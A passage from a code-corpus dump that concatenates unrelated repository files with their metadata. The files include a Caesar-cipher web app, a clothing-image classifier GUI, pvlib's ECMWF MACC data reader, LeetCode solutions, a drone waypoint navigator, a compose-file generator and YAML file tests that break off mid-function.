                        or grid[nr][nc] == 0:
                    total += 1
            return total

        return sum(exposed_sides(r, c)
                   for r in range(rows)
                   for c in range(cols)
                   if grid[r][c] == 1)
'''
m, n, Perimeter = len(grid), len(grid[0]), 0
for i in range(m):
for j in range(n):
Perimeter += 4*grid[i][j]
if i > 0: Perimeter -= grid[i][j]*grid[i-1][j]
if i < m-1: Perimeter -= grid[i][j]*grid[i+1][j]
if j > 0: Perimeter -= grid[i][j]*grid[i][j-1]
if j < n-1: Perimeter -= grid[i][j]*grid[i][j+1]
return Perimeter
''' | [
"madhav.somanath@gmail.com"
] | madhav.somanath@gmail.com |
adb7196550fdf40e9cc1626cc68f50b6734fe92d | df8029f963d8b348d83720a97fd17db693891a72 | /main.py | 916074acfa51e74fe77f065be6b2ea8a0d717a64 | [] | no_license | jonboxkc/Web-Caesar | a7a87c870d6b7d07a7335fcf82136b1651211655 | ecb51fee7619a95fdba14a4128cccd9af8476f16 | refs/heads/master | 2021-01-11T16:39:23.982116 | 2017-01-26T16:28:42 | 2017-01-26T16:28:42 | 80,133,152 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,717 | py | #!/usr/bin/env python
#
# Copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import webapp2
import caesar
import cgi
def build_page(textarea_content):
    """Return the Web Caesar HTML page, pre-filling the message textarea."""
    form_body = (
        "<label>Rotate by: </label>" +
        "<input type = 'number' name = 'rotation'/>" +
        "<br>" +
        "<label>Type a message: </label>" +
        "<textarea name = 'message'>" + textarea_content + "</textarea>" +
        "<br>" +
        "<input type= 'submit'/>"
    )
    page = "<h2>Web Caesar</h2>"
    page += "<form method ='post'>" + form_body + "</form>"
    return page
class MainHandler(webapp2.RequestHandler):
    """Serves the Web Caesar form and handles encryption submissions."""

    def get(self):
        # Fresh page with an empty textarea.
        self.response.write(build_page(""))

    def post(self):
        message = self.request.get("message")
        rotation = int(self.request.get("rotation"))
        encrypted = caesar.encrypt(message, rotation)
        # Escape the ciphertext so it cannot inject HTML into the page.
        self.response.write(build_page(cgi.escape(encrypted)))
# WSGI application entry point: route the site root to MainHandler.
app = webapp2.WSGIApplication([
    ('/', MainHandler)
], debug=True)
| [
"jonharing@gmail.com"
] | jonharing@gmail.com |
e7b901806311b84a364ee6f574ac1a461ea8a62d | 8cf87938eddba925c55ba9c6d44b548cb4a918e7 | /FMNIST/app.py | 0e67430a4645cb1ef03d5178541ab97515bff98b | [] | no_license | aj-naik/MNIST-FMNIST | d850cae6fe276bf863d683de25fa4ad12288092a | 95476ef21615b9f6803464e26a5f8a95726f4ac8 | refs/heads/main | 2023-05-11T00:12:24.605579 | 2021-06-03T08:12:09 | 2021-06-03T08:12:09 | 373,411,063 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,735 | py | from keras.models import load_model
from tkinter import *
import tkinter as tk
import win32gui
from PIL import ImageGrab, Image
import numpy as np
model = load_model('fmnist.h5')
def predict_cloth_type(img):
    """Classify a PIL image of clothing.

    Returns (predicted class index, confidence of the top class).
    """
    # Match the network's expected input: 28x28 grayscale, scaled to [0, 1].
    prepared = img.resize((28, 28)).convert('L')
    pixels = np.array(prepared).reshape(1, 28, 28, 1) / 255
    scores = model.predict([pixels])[0]
    return np.argmax(scores), max(scores)
# Tkinter window with a drawing canvas; the drawn sketch is screen-grabbed
# and classified by predict_cloth_type. Windows-only (uses win32gui).
class App(tk.Tk):
    def __init__(self):
        tk.Tk.__init__(self)
        # Last mouse position (updated while drawing).
        self.x = self.y = 0
        # Drawing surface, prediction label and control buttons.
        self.canvas = tk.Canvas(self, width=300, height=300, bg = "white", cursor="cross")
        self.label = tk.Label(self, text="Predicting", font=("Helvetica", 48))
        self.classify_btn = tk.Button(self, text = "Predict", command = self.classify_number)
        self.clear_btn = tk.Button(self, text = "Clear", command = self.clear_all)
        self.canvas.grid(row=0, column=0, pady=2, sticky=W, )
        self.label.grid(row=0, column=1,pady=2, padx=2)
        self.classify_btn.grid(row=1, column=1, pady=2, padx=2)
        self.clear_btn.grid(row=1, column=0, pady=2)
        # Draw while the left mouse button is held down.
        self.canvas.bind("<B1-Motion>", self.draw_lines)
    def clear_all(self):
        # Wipe the canvas for a new sketch.
        self.canvas.delete("all")
    def classify_number(self):
        # Grab the canvas region from the screen via its window handle,
        # classify it, and show "<class>, <confidence>%" in the label.
        handle = self.canvas.winfo_id()
        rect = win32gui.GetWindowRect(handle)
        im = ImageGrab.grab(rect)
        digit, acc = predict_cloth_type(im)
        self.label.configure(text= str(digit)+', '+ str(int(acc*100))+'%')
    def draw_lines(self, event):
        # Paint a filled dot of radius r at the cursor position.
        self.x = event.x
        self.y = event.y
        r=8
        self.canvas.create_oval(self.x-r, self.y-r, self.x + r, self.y + r, fill='black')
# Create the window and enter the Tk event loop.
app = App()
mainloop()
| [
"51918054+aj-naik@users.noreply.github.com"
] | 51918054+aj-naik@users.noreply.github.com |
01edd8becd852d512ccc8195d2ff445ca6af7674 | 67035089f755f88e333ff1d48f06b2dbd47b8bc8 | /pvlib/iotools/ecmwf_macc.py | 18262d998762bdb9663fa1871e3d3f836a0ec4cc | [
"BSD-3-Clause"
] | permissive | JoshuaC3/pvlib-python | e47c9ef4dc3d063daad1337a9543e80db6e64d70 | 59413747047ef8390a47a537b39415f7110c55c8 | refs/heads/master | 2020-04-15T16:18:31.483246 | 2019-01-09T10:43:42 | 2019-01-09T10:43:42 | 164,829,597 | 0 | 0 | BSD-3-Clause | 2019-01-09T09:17:16 | 2019-01-09T09:17:16 | null | UTF-8 | Python | false | false | 11,349 | py | """
Read data from ECMWF MACC Reanalysis.
"""
from __future__ import division
import threading
import pandas as pd
# Optional dependencies: stub them out so this module imports cleanly
# without netCDF4 / the ECMWF API client; the stubs raise ImportError
# only when actually used.
try:
    import netCDF4
except ImportError:
    class netCDF4:
        @staticmethod
        def Dataset(*a, **kw):
            raise ImportError(
                'Reading ECMWF data requires netCDF4 to be installed.')
try:
    from ecmwfapi import ECMWFDataServer
except ImportError:
    def ECMWFDataServer(*a, **kw):
        raise ImportError(
            'To download data from ECMWF requires the API client.\nSee https:/'
            '/confluence.ecmwf.int/display/WEBAPI/Access+ECMWF+Public+Datasets'
        )
    # No client available: callers must supply their own server object.
    SERVER = None
else:
    SERVER = ECMWFDataServer()
#: map of ECMWF MACC parameter keynames and codes used in API
PARAMS = {
    "tcwv": "137.128",
    "aod550": "207.210",
    'aod469': '213.210',
    'aod670': '214.210',
    'aod865': '215.210',
    "aod1240": "216.210",
}
def _ecmwf(server, startdate, stopdate, params, targetname):
# see http://apps.ecmwf.int/datasets/data/macc-reanalysis/levtype=sfc/
server.retrieve({
"class": "mc",
"dataset": "macc",
"date": "%s/to/%s" % (startdate, stopdate),
"expver": "rean",
"grid": "0.75/0.75",
"levtype": "sfc",
"param": params,
"step": "3/6/9/12/15/18/21/24",
"stream": "oper",
"format": "netcdf",
"time": "00:00:00",
"type": "fc",
"target": targetname,
})
def get_ecmwf_macc(filename, params, startdate, stopdate, lookup_params=True,
                   server=SERVER, target=_ecmwf):
    """
    Download data from the ECMWF MACC Reanalysis API in a background thread.

    Parameters
    ----------
    filename : str
        full path of file where to save data, ``.nc`` appended if not given
    params : str or sequence of str
        keynames of parameter[s] to download; see
        :const:`pvlib.iotools.ecmwf_macc.PARAMS` for the available keynames
        (``tcwv`` and the ``aodNNN`` aerosol optical depths)
    startdate : datetime.datetime or datetime.date
        UTC date
    stopdate : datetime.datetime or datetime.date
        UTC date
    lookup_params : bool, default True
        optional flag, if ``False``, then ``params`` must already be
        formatted as API codes (useful for codes not mapped in ``PARAMS``)
    server : ecmwfapi.api.ECMWFDataServer
        optionally provide a server object, default is given
    target : callable
        optional function called as
        ``target(server, startdate, stopdate, params, filename)`` to perform
        the retrieval; defaults to :func:`_ecmwf`

    Returns
    -------
    t : threading.Thread
        a daemon thread running the download; poll ``t.is_alive()`` to check
        status. Exiting Python kills it without blocking other threads.
        Requests may queue online for an hour or more before downloading;
        see http://apps.ecmwf.int/webmars/joblist/ for status, and note
        downloads expire after 24 hours.

    Notes
    -----
    Downloading requires the ECMWF API client; see
    https://confluence.ecmwf.int/display/WEBAPI/Access+ECMWF+Public+Datasets

    Precipitable water equals the total column water vapor (TCWV) reported
    in kg/m^2 at STP; divide by ten to convert to centimeters.
    """
    if not filename.endswith('nc'):
        filename += '.nc'
    if lookup_params:
        # Accept either a sequence of keynames or a single keyname: joining
        # a bare string's characters raises TypeError (None entries), which
        # routes single keynames to the direct lookup below.
        try:
            params = '/'.join(PARAMS.get(p) for p in params)
        except TypeError:
            params = PARAMS.get(params)
    startdate = startdate.strftime('%Y-%m-%d')
    stopdate = stopdate.strftime('%Y-%m-%d')
    if not server:
        server = ECMWFDataServer()
    download_thread = threading.Thread(
        target=target, daemon=True,
        args=(server, startdate, stopdate, params, filename))
    download_thread.start()
    return download_thread
class ECMWF_MACC(object):
    """Container for ECMWF MACC reanalysis data read from a netCDF4 file."""

    # total column water vapor variable name; values are kg/m^2 at
    # (1-atm, 25-degC)
    TCWV = 'tcwv'

    def __init__(self, filename):
        """Open ``filename`` and cache grid and time metadata."""
        self.data = netCDF4.Dataset(filename)
        # data variables and dimensions
        variables = set(self.data.variables.keys())
        dimensions = set(self.data.dimensions.keys())
        self.keys = tuple(variables - dimensions)
        # size of lat/lon dimensions
        self.lat_size = self.data.dimensions['latitude'].size
        self.lon_size = self.data.dimensions['longitude'].size
        # spatial resolution in degrees
        self.delta_lat = -180.0 / (self.lat_size - 1)  # from north to south
        self.delta_lon = 360.0 / self.lon_size  # from west to east
        # time resolution in hours
        self.time_size = self.data.dimensions['time'].size
        self.start_time = self.data['time'][0]
        self.stop_time = self.data['time'][-1]
        self.time_range = self.stop_time - self.start_time
        self.delta_time = self.time_range / (self.time_size - 1)

    def get_nearest_indices(self, latitude, longitude):
        """
        Get nearest indices to (latitude, longitude).

        Parameters
        ----------
        latitude : float
            Latitude in degrees
        longitude : float
            Longitude in degrees

        Returns
        -------
        idx_lat : int
            index of nearest latitude
        idx_lon : int
            index of nearest longitude
        """
        # index of nearest latitude; row 0 is the north pole (+90)
        idx_lat = int(round((latitude - 90.0) / self.delta_lat))
        # avoid out of bounds latitudes
        if idx_lat < 0:
            idx_lat = 0  # if latitude == 90, north pole
        elif idx_lat >= self.lat_size:
            # Clamp to the last valid row (south pole). The previous code
            # clamped to ``self.lat_size`` itself, which is one past the
            # end of the latitude axis and would raise an IndexError when
            # used to index the data arrays.
            idx_lat = self.lat_size - 1
        # adjust longitude from -180/180 to 0/360
        longitude = longitude % 360.0
        # index of nearest longitude; modulo wraps around the dateline
        idx_lon = int(round(longitude / self.delta_lon)) % self.lon_size
        return idx_lat, idx_lon

    def interp_data(self, latitude, longitude, utc_time, param):
        """
        Interpolate ``param`` values to ``utc_time`` using indices nearest
        to (``latitude, longitude``).

        Parameters
        ----------
        latitude : float
            Latitude in degrees
        longitude : float
            Longitude in degrees
        utc_time : datetime.datetime or datetime.date
            Naive or UTC date or datetime to interpolate
        param : str
            Name of the parameter to interpolate from the data

        Returns
        -------
        Interpolated ``param`` value at (``utc_time, latitude, longitude``)
        """
        nctime = self.data['time']  # time
        ilat, ilon = self.get_nearest_indices(latitude, longitude)
        # time index of the timestep at or before utc_time
        before = netCDF4.date2index(utc_time, nctime, select='before')
        fbefore = self.data[param][before, ilat, ilon]
        fafter = self.data[param][before + 1, ilat, ilon]
        dt_num = netCDF4.date2num(utc_time, nctime.units)
        time_ratio = (dt_num - nctime[before]) / self.delta_time
        # linear interpolation between the two bracketing timesteps
        return fbefore + (fafter - fbefore) * time_ratio
def read_ecmwf_macc(filename, latitude, longitude, utc_time_range=None):
    """
    Read data from ECMWF MACC reanalysis netCDF4 file.

    Parameters
    ----------
    filename : string
        full path to netCDF4 data file.
    latitude : float
        latitude in degrees
    longitude : float
        longitude in degrees
    utc_time_range : sequence of datetime.datetime
        pair of start and stop naive or UTC date-times

    Returns
    -------
    data : pandas.DataFrame
        dataframe for specified range of UTC date-times
    """
    ecmwf_macc = ECMWF_MACC(filename)
    try:
        # Sample all variables at the grid point nearest the request.
        ilat, ilon = ecmwf_macc.get_nearest_indices(latitude, longitude)
        nctime = ecmwf_macc.data['time']
        if utc_time_range:
            # Widen to the enclosing timesteps so the range is fully covered.
            start_idx = netCDF4.date2index(
                utc_time_range[0], nctime, select='before')
            stop_idx = netCDF4.date2index(
                utc_time_range[-1], nctime, select='after')
            time_slice = slice(start_idx, stop_idx + 1)
        else:
            time_slice = slice(0, ecmwf_macc.time_size)
        times = netCDF4.num2date(nctime[time_slice], nctime.units)
        df = {k: ecmwf_macc.data[k][time_slice, ilat, ilon]
              for k in ecmwf_macc.keys}
        if ECMWF_MACC.TCWV in df:
            # convert total column water vapor in kg/m^2 at (1-atm, 25-degC) to
            # precipitable water in cm
            df['precipitable_water'] = df[ECMWF_MACC.TCWV] / 10.0
    finally:
        # Always release the netCDF4 file handle.
        ecmwf_macc.data.close()
    return pd.DataFrame(df, index=times.astype('datetime64[s]'))
| [
"cwhanse@sandia.gov"
] | cwhanse@sandia.gov |
539b98bd26642d583bafee631ff62525e4d20ea8 | b97d0cd8afea1e29288904c72f8af8afe9180f3f | /nav.py | d4e6a326e5caed528d0cca9d65ca04d2baaefec3 | [] | no_license | jaeday/dronedeliverysystem | 5dda108ba46653ead4da4a34e90590fca25e938b | 957ab858af1237887a15df865529ba7457952a7c | refs/heads/main | 2023-08-14T03:48:13.912000 | 2021-09-21T17:25:24 | 2021-09-21T17:25:24 | 386,806,199 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,039 | py | from dataclasses import dataclass
from scipy.spatial import distance
import math
import os
# The input path can be hardcoded as a relative path
# ./routeplanning/outputfiles contains the outputs from the TSP algorithm
# implemented in C++
inputPath = "./routeplanning/outputfiles"


# This is like a C struct / C++ POD struct
@dataclass
class Point:
    # Cartesian coordinates, in the same units as the TSP output files.
    x: float
    y: float


# When True, also print an indexed tuple per rotation step.
DEBUG = False


class Nav:
    """Converts a TSP waypoint list into (rotation, distance) commands.

    The drone always begins at point 0 facing north (0 degrees) and always
    rotates to a straight-line trajectory before travelling anywhere.
    """

    def __init__(self) -> None:
        self.coords = []     # waypoints loaded by readCoords()
        self.rotations = []  # [rotation_degrees, distance] command pairs
        self.lastRot = 0.0   # most recent rotation appended to the path

    def readCoords(self, i: int) -> None:
        """
        Reads the coordinates of the file "coords<i>.txt" in the inputPath
        (e.g. coords0.txt, coords10.txt, etc.) into self.coords.
        """
        filename = inputPath + "/coords" + str(i) + ".txt"
        # Opens the input file in read-only mode
        coordFile = open(filename, "r")
        points = coordFile.readlines()
        for point in points:
            coordPair = point.split()
            p = Point(float(coordPair[0]), float(coordPair[1]))
            self.coords.append(p)

    def calculateRot(self, currentCoord: Point, nextCoord: Point) -> float:
        """
        Returns the rotation (degrees, clockwise positive from north)
        required to get the drone from currentCoord to nextCoord in a
        straight line.
        """
        # Cases where rotations can be made in multiples of 90 degrees.
        # Straight ahead or at the same position
        if currentCoord.x == nextCoord.x and currentCoord.y == nextCoord.y or \
           currentCoord.x == nextCoord.x and currentCoord.y < nextCoord.y:
            return 0
        # 90 degrees clockwise
        elif currentCoord.x < nextCoord.x and currentCoord.y == nextCoord.y:
            return 90
        # 180 degrees
        elif currentCoord.x == nextCoord.x and currentCoord.y > nextCoord.y:
            return 180
        # 90 degrees counterclockwise
        elif currentCoord.x > nextCoord.x and currentCoord.y == nextCoord.y:
            return -90
        xDist = nextCoord.x - currentCoord.x
        yDist = nextCoord.y - currentCoord.y
        xDistPos = bool(xDist > 0)
        yDistPos = bool(yDist > 0)
        # The base angle is arctan(|xDist| / |yDist|).
        # Note: yDist cannot be 0 here because every zero-yDist case
        # already returned above as a multiple of 90 degrees.
        rotAngle = math.degrees(math.atan(math.fabs(xDist) / math.fabs(yDist)))
        # Quadrant-dependent offsets:
        #   +x/+y -> no offset; +x/-y -> mirror (180 - angle);
        #   -x/+y -> flip sign; -x/-y -> add 180.
        if xDistPos and yDistPos:
            pass
        elif xDistPos and not yDistPos:
            rotAngle = 180 - rotAngle
        elif not xDistPos and yDistPos:
            rotAngle *= -1
        else:
            rotAngle += 180
        return rotAngle

    def _appendLink(self, currentCoord: Point, nextCoord: Point) -> None:
        """Appends the [rotation, distance] pair linking two waypoints and
        records the rotation in self.lastRot."""
        rotation = self.calculateRot(currentCoord, nextCoord)
        self.lastRot = rotation
        dist = distance.euclidean((currentCoord.x, currentCoord.y),
                                  (nextCoord.x, nextCoord.y))
        self.rotations.append([rotation, dist])

    def createPath(self) -> None:
        """
        Calculates all of the rotations and distances required to link all
        of the points in the loaded file, then prints them to stdout.
        """
        # Link every consecutive pair of waypoints. (The wrap-around link
        # below previously duplicated this loop body verbatim; both now
        # share the _appendLink helper.)
        for i in range(0, len(self.coords) - 1):
            self._appendLink(self.coords[i], self.coords[i + 1])
        # Undo the last rotation so the drone points to (relative) 0 N.
        self.rotations.append([-self.lastRot, 0.0])
        # The wrap-around link back to the starting waypoint.
        self._appendLink(self.coords[-1], self.coords[0])
        self.rotations.append([-self.lastRot, 0.0])
        # Print each rotation and distance rounded to 2 decimal places.
        count = 0
        for i in self.rotations:
            if DEBUG:
                print(count, (round(i[0], 2), round(i[1], 2)))
            print(str(round(i[0], 2)) + " " + str(round(i[1], 2)))
            count += 1
# Counter variable
i = 1
# Wrapper function for the Nav class
for file in os.listdir(inputPath):
n = Nav()
currentFile = os.path.join(inputPath, file)
n.readCoords(i)
i += 1
n.createPath()
| [
"sjaemin@umich.edu"
] | sjaemin@umich.edu |
a7d11fe7ad97288252922c00a7c365e7199665ed | 43e900f11e2b230cdc0b2e48007d40294fefd87a | /Amazon/VideoOnsite/162.find-peak-element.py | 5b3ada63691cf9fcf4b02f7261a2be18b71ec8d7 | [] | no_license | DarkAlexWang/leetcode | 02f2ed993688c34d3ce8f95d81b3e36a53ca002f | 89142297559af20cf990a8e40975811b4be36955 | refs/heads/master | 2023-01-07T13:01:19.598427 | 2022-12-28T19:00:19 | 2022-12-28T19:00:19 | 232,729,581 | 3 | 1 | null | null | null | null | UTF-8 | Python | false | false | 557 | py | #
# @lc app=leetcode id=162 lang=python3
#
# [162] Find Peak Element
#
# @lc code=start
class Solution:
    def findPeakElement(self, nums: List[int]) -> int:
        """Return an index of a peak element via binary search (O(log n))."""
        lo, hi = 0, len(nums) - 1
        # Narrow until only two candidate positions remain.
        while lo + 1 < hi:
            mid = (lo + hi) // 2
            # A strict local maximum is a peak by definition.
            if nums[mid - 1] < nums[mid] > nums[mid + 1]:
                return mid
            # Otherwise follow the rising side: a peak must lie there.
            if nums[mid] > nums[mid + 1]:
                hi = mid
            else:
                lo = mid
        # Two candidates left: the larger one is a peak (ties keep lo).
        return hi if nums[hi] > nums[lo] else lo
| [
"wangzhihuan0815@gmail.com"
] | wangzhihuan0815@gmail.com |
a4c7d9c19632ad8e7d7c570e772ee1049d061d92 | ec330e2739dbacd39be5f81e6ea44aa856c559f7 | /server/compose/compose_generator.py | 84d29378355e282ad14d0ce5eb6777881c39683e | [] | no_license | unitartu-remrob/remrob-server | 2caeaa882d58e54bfd0b81f07c119358d8f3b63a | 0833a0f8bc3f7bae2fcfdf0a2601ba376321b781 | refs/heads/main | 2023-08-30T14:31:23.754963 | 2023-03-25T10:31:14 | 2023-03-25T10:31:14 | 484,731,849 | 1 | 0 | null | 2022-08-03T13:43:34 | 2022-04-23T11:45:36 | JavaScript | UTF-8 | Python | false | false | 995 | py | import yaml
from jinja2 import Environment, FileSystemLoader
if __name__ == "__main__":
robo_config_macvlan = yaml.safe_load(open('config/config-macvlan.yaml'))
robo_config_local = yaml.safe_load(open('config/config-local.yaml'))
# Load templates file from templtes folder
env = Environment(loader = FileSystemLoader('./templates'), trim_blocks=True, lstrip_blocks=True)
template_macvlan = env.get_template('macvlan.j2')
template_local = env.get_template('local.j2')
for i, robot in enumerate(robo_config_macvlan):
output = template_macvlan.render(
name=robot["name"],
robotont=robot["master-name"],
master_ip=robot["master-ip"],
self_ip=robot["self-ip"]
)
file = open(f"./macvlan/robo-{i+1}.yaml", "w")
file.write(output)
file.close()
for i, robot in enumerate(robo_config_local):
output = template_local.render(
name=robot["name"],
port=robot["port"]
)
file = open(f"./local/robosim-{i+1}.yaml", "w")
file.write(output)
file.close()
| [
"chooky823@gmail.com"
] | chooky823@gmail.com |
5ecceb0860a1e10a08204b9871fd1c2dc693070c | 13ba299b31ef0182c69ed0b175e148c7d824f898 | /Week_1/Chapter_11/section_2_6/exercise_1.py | ab0a54f85be8c15b812e4cd80c54dd9ce64c157b | [] | no_license | Marnix641/advanced_course | ba5d5541dbe2f77dd934f018658848e5b441960e | bf3937c17f50f33f21e0e2f2ecc77da7cb3692d8 | refs/heads/master | 2022-11-08T04:18:44.760994 | 2020-07-02T15:44:08 | 2020-07-02T15:44:08 | 256,275,717 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 178 | py | from Week_1.Chapter_11.section_1_12.point import Point
from Week_1.Chapter_11.section_2_6.rectangle import Rectangle
r = Rectangle(Point(0, 0), 20, 15)
r.area()
print(r.area()) | [
"m.dekker.18@student.rug.nl"
] | m.dekker.18@student.rug.nl |
04fa896307a6d243658fb915099d337f76804cd5 | 86813bf514f3e0257f92207f40a68443f08ee44b | /0406 根据身高重建队列/0406 根据身高重建队列.py | 989f32ac1430a2408dcaef254410bf9310c75be2 | [] | no_license | Aurora-yuan/Leetcode_Python3 | 4ce56679b48862c87addc8cd870cdd525c9d926c | 720bb530850febc2aa67a56a7a0b3a85ab37f415 | refs/heads/master | 2021-07-12T13:23:19.399155 | 2020-10-21T03:14:36 | 2020-10-21T03:14:36 | 212,998,500 | 4 | 1 | null | null | null | null | UTF-8 | Python | false | false | 838 | py | #label: 贪心算法 difficulty: medium
"""
思路
1.排序:按照身高从高到低排,升高相同的按k从小到大排
2.插入:按照排序好的顺序逐个插入新数组,插入的位置按照k来插
如示例中,排序完:
[[7,0], [7,1], [6,1], [5,0], [5,2],[4,4]]
插入的过程:
第一插:[[7,0]]
第二插:[[7,0], [7,1]]
第三插:[[7,0], [6,1],[7,1]]
第四插:[[5,0],[7,0], [6,1],[7,1]]
...
先插高的,后插矮的,即使后插的插到前面也不会有影像,因为矮
"""
class Solution(object):
    def reconstructQueue(self, people):
        """
        :type people: List[List[int]]
        :rtype: List[List[int]]
        """
        # Sort tallest first; among equal heights, smaller k first.
        # The original used a Python-2-only tuple-parameter lambda
        # ``lambda (h, k): (-h, k)``, which is a SyntaxError on Python 3;
        # index the pair explicitly instead.
        people.sort(key=lambda p: (-p[0], p[1]))
        res = []
        for p in people:
            # Everyone already placed is at least as tall, so inserting at
            # index k leaves exactly k taller-or-equal people in front.
            res.insert(p[1], p)
        return res
| [
"noreply@github.com"
] | Aurora-yuan.noreply@github.com |
1b9b0ce483b3eaacca83d0e2604376ba6a14b1e8 | ce82af15e3318049555292d84249dc64ed70bbc4 | /conda_kapsel/test/test_yaml_file.py | ede797cceb91947bd15029da5d29afb48b0667c2 | [] | no_license | digideskio/kapsel | 2c75d2ce0bd4e546f058640a38099b76f5eefbb8 | 207a3452df2c09ee5bf70770de4ed93afa2d91b9 | refs/heads/master | 2021-01-18T18:26:11.772284 | 2016-07-28T14:15:01 | 2016-09-07T15:31:48 | 67,981,204 | 0 | 1 | null | 2016-09-12T06:15:29 | 2016-09-12T06:15:27 | Python | UTF-8 | Python | false | false | 15,237 | py | # -*- coding: utf-8 -*-
# ----------------------------------------------------------------------------
# Copyright © 2016, Continuum Analytics, Inc. All rights reserved.
#
# The full license is in the file LICENSE.txt, distributed with this software.
# ----------------------------------------------------------------------------
from conda_kapsel.yaml_file import YamlFile
from conda_kapsel.internal.test.tmpfile_utils import with_file_contents, with_directory_contents
import errno
import os
import pytest
def test_read_yaml_file_and_get_value():
    """Values are reachable via list, string and tuple key paths."""
    def verify(path):
        loaded = YamlFile(path)
        assert not loaded.corrupted
        assert loaded.corrupted_error_message is None
        assert loaded.change_count == 1
        # path given as a list of keys
        assert loaded.get_value(["a", "b"]) == "c"
        # path given as a single string
        assert loaded.get_value("a") == dict(b="c")
        # path given as a tuple, to show we aren't list-specific
        assert loaded.get_value(("a", "b")) == "c"
        assert loaded.root == dict(a=dict(b='c'))

    with_file_contents("""
a:
  b: c
""", verify)
def test_read_yaml_file_and_get_default():
    """A missing nested key falls back to the supplied default."""
    def verify(path):
        loaded = YamlFile(path)
        assert loaded.get_value(["a", "z"], "default") == "default"

    with_file_contents("""
a:
  b: c
""", verify)
def test_read_empty_yaml_file_and_get_default():
    """An empty file yields the default for any lookup."""
    def verify(path):
        assert YamlFile(path).get_value(["a", "z"], "default") == "default"

    with_file_contents("", verify)
def test_read_yaml_file_and_get_list_valued_section():
    """A list-valued section comes back as a plain Python list."""
    def verify(path):
        assert YamlFile(path).get_value("a") == [1, 2, 3]

    with_file_contents("""
a: [1,2,3]
""", verify)
def test_read_yaml_file_and_get_default_due_to_missing_section():
    """A lookup whose first path segment is absent yields the default."""
    def verify(path):
        assert YamlFile(path).get_value(["z", "b"], "default") == "default"

    with_file_contents("""
a:
  b: c
""", verify)
def test_read_yaml_file_and_get_default_due_to_non_dict_section():
    """Looking for a child key under a scalar section yields the default."""
    def verify(path):
        assert YamlFile(path).get_value(["a", "b"], "default") == "default"

    with_file_contents("""
a: 42
""", verify)
def test_invalid_path():
    """A non-string, non-iterable path argument raises ValueError."""
    def verify(path):
        loaded = YamlFile(path)
        assert not loaded.corrupted
        with pytest.raises(ValueError) as excinfo:
            loaded.get_value(42)
        assert "YAML file path must be a string or an iterable of strings" in repr(excinfo.value)

    with_file_contents("""
a:
  b: c
""", verify)
def test_read_missing_yaml_file_and_get_default_due_to_missing_section():
    """Reading a nonexistent file behaves like reading an empty one."""
    def verify(dirname):
        missing = YamlFile(os.path.join(dirname, "nope.yaml"))
        assert missing.get_value(["z", "b"], "default") == "default"

    with_directory_contents(dict(), verify)
def test_read_yaml_file_that_is_a_directory():
def check_read_directory(dirname):
filename = os.path.join(dirname, "dir.yaml")
os.makedirs(filename)
with pytest.raises(IOError) as excinfo:
YamlFile(filename)
import platform
if platform.system() == 'Windows':
assert errno.EACCES == excinfo.value.errno
else:
assert errno.EISDIR == excinfo.value.errno
with_directory_contents(dict(), check_read_directory)
def test_read_yaml_file_and_change_value():
# ruamel.yaml does reformat yaml files a little bit,
# for example it picks its own indentation, even
# as it tries to keep comments and stuff. So
# this test cheats by using input that happens
# to be in the format ruamel.yaml will generate.
# Oh well.
template = """
# this is a comment 1
a:
# this is a comment 2
b: %s
"""
template = template[1:] # chop leading newline
original_value = "c"
original_content = template % (original_value)
changed_value = 42
changed_content = template % (changed_value)
def change_abc(filename):
yaml = YamlFile(filename)
assert yaml.change_count == 1
value = yaml.get_value(["a", "b"])
assert original_value == value
yaml.set_value(["a", "b"], changed_value)
yaml.save()
import codecs
with codecs.open(filename, 'r', 'utf-8') as file:
changed = file.read()
assert changed_content == changed
yaml2 = YamlFile(filename)
assert yaml2.change_count == 1
value2 = yaml2.get_value(["a", "b"])
assert changed_value == value2
with_file_contents(original_content, change_abc)
def test_read_missing_yaml_file_and_set_value():
def set_abc(dirname):
filename = os.path.join(dirname, "foo.yaml")
assert not os.path.exists(filename)
yaml = YamlFile(filename)
value = yaml.get_value(["a", "b"])
assert value is None
yaml.set_value(["a", "b"], 42)
yaml.save()
assert os.path.exists(filename)
import codecs
with codecs.open(filename, 'r', 'utf-8') as file:
changed = file.read()
expected = """
# yaml file
a:
b: 42
""" [1:]
assert expected == changed
yaml2 = YamlFile(filename)
value2 = yaml2.get_value(["a", "b"])
assert 42 == value2
with_directory_contents(dict(), set_abc)
def test_read_yaml_file_and_add_section():
original_content = """
a:
b: c
"""
def add_section(filename):
yaml = YamlFile(filename)
value = yaml.get_value(["a", "b"])
assert "c" == value
yaml.set_value(["x", "y"], dict(z=42, q="rs"))
assert yaml.change_count == 1
yaml.save()
assert yaml.change_count == 2
yaml2 = YamlFile(filename)
value2 = yaml2.get_value(["a", "b"])
assert "c" == value2
added_value = yaml2.get_value(["x", "y", "z"])
assert 42 == added_value
added_value_2 = yaml2.get_value(["x", "y", "q"])
assert "rs" == added_value_2
print(open(filename, 'r').read())
with_file_contents(original_content, add_section)
def test_transform_yaml():
def transform_test(dirname):
filename = os.path.join(dirname, "foo.yaml")
assert not os.path.exists(filename)
yaml = YamlFile(filename)
assert yaml.change_count == 1
# save so we aren't dirty due to nonexistent file
yaml.save()
assert os.path.exists(filename)
assert yaml.change_count == 2
def transformer(tree):
tree['foo'] = dict()
tree['foo']['bar'] = 42
assert not yaml._dirty
yaml.transform_yaml(transformer)
assert yaml._dirty
yaml.save()
assert yaml.change_count == 3
import codecs
with codecs.open(filename, 'r', 'utf-8') as file:
changed = file.read()
expected = """
# yaml file
foo:
bar: 42
""" [1:]
assert expected == changed
yaml2 = YamlFile(filename)
value2 = yaml2.get_value(["foo", "bar"])
assert 42 == value2
with_directory_contents(dict(), transform_test)
def test_transform_yaml_does_nothing():
def transform_test(dirname):
filename = os.path.join(dirname, "foo.yaml")
assert not os.path.exists(filename)
yaml = YamlFile(filename)
assert yaml.change_count == 1
# save so we aren't dirty due to nonexistent file
yaml.save()
assert yaml.change_count == 2
assert os.path.exists(filename)
def transformer(tree):
